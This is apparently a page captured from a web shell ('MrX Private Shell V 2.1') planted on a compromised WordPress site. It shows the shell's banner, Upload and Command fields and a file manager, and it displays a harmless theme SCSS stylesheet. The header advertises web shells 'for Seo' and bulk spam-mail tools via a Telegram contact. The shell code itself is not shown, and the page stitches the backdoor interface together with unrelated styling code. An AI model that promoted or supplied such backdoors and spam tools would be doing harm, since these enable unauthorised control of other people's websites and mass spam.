__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
.ct-layers {
	margin: 0;
	padding: 0;
	list-style: none;

	&:not(:empty) + button {
		margin-top: 20px;
	}
}

.ct-layer {
	list-style: none;
	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
	z-index: 9999999;
	margin-bottom: 8px;


	// disabled state
	&:not(.ct-disabled) {

		> .ct-layer-controls {

			.ct-unseen {
				display: none;
			}
		}
	}

	&.ct-disabled {
		opacity: 0.6;

		> .ct-layer-controls {

			.ct-seen {
				display: none;
			}

			.ct-clone,
			.ct-toggle {
				pointer-events: none;
			}
		}

		> .ct-layer-content {
			display: none;
		}
	}

	// active state
	&:not(.ct-active) {

		> .ct-layer-controls {
			border-radius: var(--ui-border-radius, 2px);

			.ct-arrow-up {
				display: none;
			}
		}
	}

	&.ct-active {

		> .ct-layer-controls {
			border-radius: var(--ui-border-radius, 2px) var(--ui-border-radius, 2px) 0 0;

			.ct-arrow-down {
				display: none;
			}
		}

		> .ct-layer-content {
			border-radius: 0 0 var(--ui-border-radius, 2px) var(--ui-border-radius, 2px);
		}
	}

	// hidden state
	&.ct-hidden {
		margin: 0;
		height: 0;
		visibility: hidden;
	}
}

.ct-layer-controls {
	display: flex;
	height: var(--layer-height, 36px);
	background: #fff;
	border: 1px solid var(--optionBorderColor);
	user-select: none;
	box-sizing: border-box;

	button {
		display: flex;
		align-items: center;
		justify-content: center;
		flex: 0 0 var(--layer-height, 36px);
		width: var(--layer-height, 36px);
		height: 100%;
		border: none;
		background: transparent;
		box-shadow: none;
		padding: 0;
		cursor: pointer;
		color: #72777c;

		&:focus {
			outline: none;
		}

		&.ct-remove {

			&:hover {
				color: #dd4b39;
			}
		}
	}

	> * {
		&:not(:last-child) {
			border-inline-end: 1px solid var(--optionBorderColor);
		}
	}
}

.ct-layer-label {
	display: flex;
	align-items: center;
	flex: 1;
	font-size: 12px;
	font-weight: 500;
	min-width: 0;
	padding-inline-end: 5px;
	padding-inline-start: 10px;

	span {
		overflow: hidden;
		white-space: nowrap;
		text-overflow: ellipsis;
	}
}

.ct-layer-content {
	display: flex;
	flex-direction: column;
	background: #fff;
	border-top: none !important;
	
	&:not(:empty) {
		border: 1px solid var(--optionBorderColor);
	}

	> * {
		--options-vertical-spacing: 18px;
		--options-horizontal-spacing: 0 20px 18px 20px;

		&:not(:last-child) {
			border-bottom: 1px solid var(--optionBorderColor);
		}
	}
}


// add layer
.ct-add-layer-controls {
	display: flex;
	align-items: center;
	gap: 7px;
	padding-bottom: 10px;

	.ct-select-input {
		max-width: 100%;
	}

	button.button {
		display: flex;
		align-items: center;
		justify-content: center;
		flex: 0 0 38px;
		padding: 0;

		svg {
			fill: currentColor;
		}
	}
}

.ct-layers-split-layout {
	min-height: 50px;
}

Filemanager

Name Type Size Permission Actions
background Folder 0750
color Folder 0750
modal Folder 0750
animated-checkbox.scss File 1.82 KB 0640
attachment.scss File 1017 B 0640
border.scss File 606 B 0640
box-shadow.scss File 1.92 KB 0640
buttons-group.scss File 2.42 KB 0640
checkbox.scss File 1.03 KB 0640
ct-inner-layers.scss File 163 B 0640
ct-layers.scss File 2.67 KB 0640
ct-panel.scss File 4.56 KB 0640
ct-select.scss File 3.05 KB 0640
date-picker.scss File 1.28 KB 0640
devices.scss File 693 B 0640
file-uploader.scss File 49 B 0640
general.scss File 4.88 KB 0640
icon-picker.scss File 2.52 KB 0640
image-picker.scss File 1.89 KB 0640
image-position.scss File 198 B 0640
input.scss File 1.09 KB 0640
labeled-group.scss File 249 B 0640
main.scss File 1.79 KB 0640
modal-tabs.scss File 785 B 0640
more-options-trigger.scss File 1.02 KB 0640
notification.scss File 547 B 0640
number.scss File 1.32 KB 0640
option-modal.scss File 1.09 KB 0640
option-state.scss File 144 B 0640
options-group.scss File 815 B 0640
options-inherit-state.scss File 616 B 0640
options-rtl.scss File 728 B 0640
options-type-gutenberg.scss File 2.43 KB 0640
radio.scss File 1.85 KB 0640
ratio-picker.scss File 3.43 KB 0640
responsive-controls.scss File 321 B 0640
revert.scss File 1.28 KB 0640
root-styles.scss File 67 B 0640
slider.scss File 2.41 KB 0640
spacing.scss File 1.17 KB 0640
switch.scss File 782 B 0640
tabs.scss File 2.23 KB 0640
taxonomies-options.scss File 207 B 0640
textarea.scss File 507 B 0640
thumbnail-actions.scss File 2.61 KB 0640
time-picker.scss File 183 B 0640
tools-panel-component.scss File 481 B 0640
tooltip.scss File 2.24 KB 0640
typography.scss File 9.15 KB 0640
upload-button.scss File 372 B 0640
value-changer.scss File 3.48 KB 0640
visibility.scss File 27 B 0640
widgets-areas-screen.scss File 740 B 0640
widgets-block-area.scss File 820 B 0640
widgets-common.scss File 1.03 KB 0640
woo-accordion.scss File 1.16 KB 0640
woo-image-variations.scss File 372 B 0640
woo-numbers.scss File 187 B 0640
wp-editor.scss File 379 B 0640
Filemanager